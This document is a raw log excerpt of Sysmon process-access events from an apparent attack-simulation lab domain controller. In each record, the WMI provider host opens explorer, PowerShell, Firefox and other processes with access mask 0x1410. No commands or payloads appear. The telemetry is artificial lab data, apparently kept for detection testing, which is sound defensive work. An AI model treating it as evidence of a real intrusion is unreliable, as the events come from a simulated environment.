Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.684{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.674{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 